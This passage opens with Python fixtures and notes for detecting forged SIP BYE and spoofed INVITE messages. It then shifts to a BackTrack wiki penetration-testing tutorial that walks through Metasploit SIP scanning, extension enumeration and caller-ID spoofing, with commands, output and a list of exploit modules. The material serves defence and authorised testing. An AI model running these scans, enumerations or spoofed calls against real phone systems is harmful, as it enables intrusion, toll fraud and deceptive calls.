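OK_200 = _msg("SIP/2.0 200 OK", "192.168.1.111:5060;branch=z9hG4bK-c1",
              '"201" <sip:201@192.168.1.104>;tag=hcykd', "<sip:200@192.168.1.104>;tag=as644fe807", "1 INVITE")
# Modeled on the page's teardown payload: correct dialog identifiers, wrong sender.
INJECTED_BYE = _msg("BYE sip:200@192.168.1.104:5060 SIP/2.0", "192.168.1.105:9;branch=91ca1ba598ee44d5917061c30981c565",
                    "<sip:192.168.1.104>;tag=hcykd", "200 <sip:200@192.168.1.104>;tag=as644fe807", "2000000000 BYE")
LEGIT_BYE = _msg("BYE sip:200@192.168.1.104:5060 SIP/2.0", "192.168.1.111:5060;branch=z9hG4bK-c2",
                 '"201" <sip:201@192.168.1.104>;tag=hcykd', "<sip:200@192.168.1.104>;tag=as644fe807", "2 BYE")
SPOOFED_INVITE = _msg("INVITE sip:200@192.168.1.104 SIP/2.0", "192.168.1.105:9;branch=z9hG4bK-x1",
                      '"Evil Hacker" <sip:201@192.168.1.104>;tag=abcd', "<sip:200@192.168.1.104>", "1 INVITE",
                      call_id="spoof-1@192.168.1.105")
REGISTRATIONS = {"192.168.1.111": '"201" <sip:201@192.168.1.104>'}   # constructed binding table
```

The address check is what defeats the teardown payload on the page: its Call-ID and tags are copied faithfully, but the Via host 192.168.1.105 (source port 9) never appeared in the INVITE or its 200 OK. Checking both the capture's source IP and the Via host also catches a BYE sent with a spoofed source address. A registrar that derives caller ID the same way, from the authenticated binding rather than the From header, makes the spoofed INVITE display the sender's real extension, or get rejected when the sender has none.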
Attacking VoIP Using Metasploit
The Metasploit framework includes several auxiliaries and modules dedicated to VoIP exploitation. You can find them by using the search function with keywords such as sip or voip. Let's launch msfconsole and perform a search for the available modules:
root@bt:~# msfconsole
msf > search sip
Metasploit VoIP Modules
Here's a complete list of the available modules for your reference:
Auxiliaries
scanner/sip/enumerator SIP Username Enumerator (UDP)
scanner/sip/enumerator_tcp SIP Username Enumerator (TCP)
scanner/sip/options SIP Endpoint Scanner (UDP)
scanner/sip/options_tcp SIP Endpoint Scanner (TCP)
voip/sip_invite_spoof SIP Invite Spoof
Exploits
windows/sip/aim_triton_cseq AIM Triton 1.0.4 CSeq Buffer Overflow
windows/sip/sipxezphone_cseq SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
windows/sip/sipxphone_cseq SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
unix/webapp/trixbox_langchoice Trixbox langChoice PHP Local File Inclusion
Scanning SIP Enabled Devices
Metasploit provides a SIP scanner auxiliary which comes in two flavors, TCP and UDP; we can use it to discover SIP enabled devices using the OPTIONS method. Let's see an example of the UDP version, the scanner/sip/options auxiliary. Auxiliary options are:
msf > use auxiliary/scanner/sip/options
msf auxiliary(options) > show options
Module options (auxiliary/scanner/sip/options):
Name Current Setting Required Description
BATCHSIZE 256 yes The number of hosts to probe in each set
CHOST no The local client address
CPORT 5060 no The local client port
RHOSTS yes The target address range or CIDR identifier
RPORT 5060 yes The target port
THREADS 1 yes The number of concurrent threads
TO nobody no The destination username to probe at each host
msf auxiliary(options) > set RHOSTS 192.168.1.130/24
RHOSTS => 192.168.1.130/24
msf auxiliary(options) > run
[*] 192.168.1.20 200 agent='Grandstream HT502V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.21 200 agent='Grandstream HT502V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.22 200 agent='Grandstream HT502V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.92 200 agent='Grandstream HT502V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.140 200 agent='Grandstream HT502V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.130 200 server='Asterisk PBX 1.6.2.13' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
Enumerating SIP extensions/Usernames
The scanner/sip/enumerator auxiliary can be used to discover valid SIP accounts; it supports two methods of discovery, OPTIONS and REGISTER, and it also comes in two flavors, TCP and UDP. Auxiliary options:
msf > use scanner/sip/enumerator
msf auxiliary(enumerator) > show options
Module options (auxiliary/scanner/sip/enumerator):
Name Current Setting Required Description
BATCHSIZE 256 yes The number of hosts to probe in each set
CHOST no The local client address
CPORT 5060 no The local client port
MAXEXT 9999 yes Ending extension
METHOD REGISTER yes Enumeration method to use OPTIONS/REGISTER
MINEXT 0 yes Starting extension
PADLEN 4 yes Cero padding maximum length
RHOSTS yes The target address range or CIDR identifier
RPORT 5060 yes The target port
THREADS 1 yes The number of concurrent threads
Example Usage:
msf auxiliary(enumerator) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(enumerator) > set MINEXT 100
MINEXT => 100
msf auxiliary(enumerator) > set MAXEXT 500
MAXEXT => 500
msf auxiliary(enumerator) > set PADLEN 3
PADLEN => 3
msf auxiliary(enumerator) > run
[*] Found user: 200 <sip:[email protected]> [Auth]
[*] Found user: 201 <sip:[email protected]> [Auth]
[*] Found user: 202 <sip:[email protected]> [Auth]
[*] Found user: 203 <sip:[email protected]> [Auth]
[*] Found user: 204 <sip:[email protected]> [Auth]
[*] Found user: 300 <sip:[email protected]> [Auth]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Spoofing Caller ID auxiliary
The voip/sip_invite_spoof auxiliary will create a fake SIP INVITE request, making the targeted device ring and display fake caller ID information. Auxiliary Options:
msf > use voip/sip_invite_spoof
msf auxiliary(sip_invite_spoof) > show options
Module options (auxiliary/voip/sip_invite_spoof):
Name Current Setting Required Description
MSG The Metasploit has you yes The spoofed caller id to send
RHOSTS yes The target address range or CIDR identifier
RPORT 5060 yes The target port
SRCADDR 192.168.1.1 yes The sip address the spoofed call is coming from
THREADS 1 yes The number of concurrent threads
Example Usage:
msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(sip_invite_spoof) > run
[*] Sending Fake SIP Invite to: 192.168.1.104
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Exploiting VoIP systems
Metasploit includes several exploits for SIP client software and even for the Trixbox PBX web management interface. Although this is not a SIP specific vulnerability, it is still related and can give an attacker full control of a PBX.
Closing Words
I hope you've found this document informative; please keep in mind that Backtrack Linux provides many tools and features I haven't covered here. Take the time to browse the tools and read the manuals and READMEs; I am sure you'll find the right tool for the job.
Feel free to discuss the tools and methods mentioned here in the Backtrack Linux Forums; we would love to hear your feedback and experiences.
http://www.backtracklinux.org/forums/
About The Author
Shai Rod (aka @NightRang3r) is a full time pen tester at Avnet Information Security & Risk Management in Israel. He holds Offensive Security OSCP and OSCE certifications (among others) and manages his blog at http://exploit.co.il
Retrieved from "http://www.backtracklinux.org/wiki/index.php?title=Pentesting_VOIP&oldid=789"
This page was last modified on 12 June 2011, at 19:16.